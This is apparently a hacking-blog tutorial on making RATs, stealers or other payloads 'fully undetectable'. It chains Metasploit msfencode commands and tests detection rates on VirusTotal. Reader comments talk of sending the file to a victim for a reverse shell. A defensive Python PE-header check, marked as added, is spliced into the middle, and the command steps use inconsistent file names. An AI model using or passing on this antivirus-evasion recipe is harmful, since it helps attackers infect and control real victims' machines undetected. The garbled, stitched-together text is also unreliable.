Requirements:
1. Backtrack Operating System
2. MSF encoders
So, our first step is to create a virus file with any of the tools like RAT, stealers, botnets, payload or anything. To make it FUD (Fully Undetectable), we use Backtrack. Before going to FUD, check your file against the antivirus engines at virustotal.com to get a detection ratio; for example, let's say 30/44.
Now start terminal in Backtrack and navigate to the directory where your file is located.
E.g. cd Desktop
So our first step is to change the permissions of that file (775) by typing this command
root@bt:~/Desktop# chmod 775 stub.exe
Next, type this command to encode your virus:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o /root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
You’ll notice that antivirus still detects it even though we encoded it 10 times with the “x86/shikata_ga_nai” encoder.
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server2.exe
Now, for the second pass, we use another encoder named “jmp_call_additive”:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o /root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server3.exe
Now again we use another encoder named “call4_dword_xor”:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o /root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server4.exe
Finally, we encode again with the “shikata_ga_nai” encoder:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o /root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 final.exe
Now you'll get a final.exe, upload it to virustotal.com and you’ll see the results.
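A defender-side triage check, added here as an example and not part of the original post: it flags a file whose name claims .exe but whose bytes carry no valid MZ/PE headers, which is what raw (`-t raw`) encoder output looks like to Windows and to a scanner, so a lower detection ratio on such a file does not by itself mean a working executable slipped past. The sample buffers are constructed and all function names are hypothetical.

```python
import math
import struct
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; values near 8.0 are typical of encoded or packed data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def pe_status(data: bytes) -> str:
    """Classify a buffer by its DOS (MZ) and PE headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "no-mz-header"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of PE header
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "bad-pe-signature"
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return {0x014C: "pe-x86", 0x8664: "pe-x64"}.get(machine, "pe-other")

def triage(name: str, data: bytes) -> dict:
    """Report header validity, entropy, and any name/content mismatch."""
    status = pe_status(data)
    claims_exe = name.lower().endswith(".exe")
    return {
        "name": name,
        "pe_status": status,
        "entropy": round(shannon_entropy(data), 2),
        # An .exe name on a body that is not a PE image is worth an alert.
        "extension_mismatch": claims_exe and not status.startswith("pe-"),
    }

def constructed_pe() -> bytes:
    """Constructed sample: minimal DOS header, PE signature, x86 machine."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    return dos + b"PE\0\0" + struct.pack("<H", 0x014C) + b"\0" * 18

def constructed_blob() -> bytes:
    """Constructed sample: header-less bytes with a uniform distribution."""
    return bytes((i * 197 + 13) % 256 for i in range(4096))

if __name__ == "__main__":
    print(triage("sample.exe", constructed_pe()))
    print(triage("final.exe", constructed_blob()))
```

On a mail gateway or file share, the same check can be run over inbound attachments and new files, routing anything with `extension_mismatch` set to quarantine or sandbox analysis.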
11 comments
But then when I try to open it on Windows it says that the version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.
It won't open cause it's an encoded file in backtrack just send it to any other victim or try on your cm machine it will give a reverse connection in metasploit or i suggest you might you did anything wrong during this process :)
Is fud because is file raw and not work is normally lol he don't have create exe at end lol
R.I.P English -_- first of all it's about to create stub FUD not an exe file.
You deleted my comment even tho I stuck up for you wow thanks....hope to see you soon
Don't post backlinks over here. Use ur SEO techs somewhere else not on this blog. Leave a comment here or any query without any refer or back links. Hope you get it.
After I type this command (msfencode -i /root/Desktop/RAT.exe -t raw -o /root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10) it just stops there
Use msfvenom or watch my latest video which is related to msfvenom...
Thanks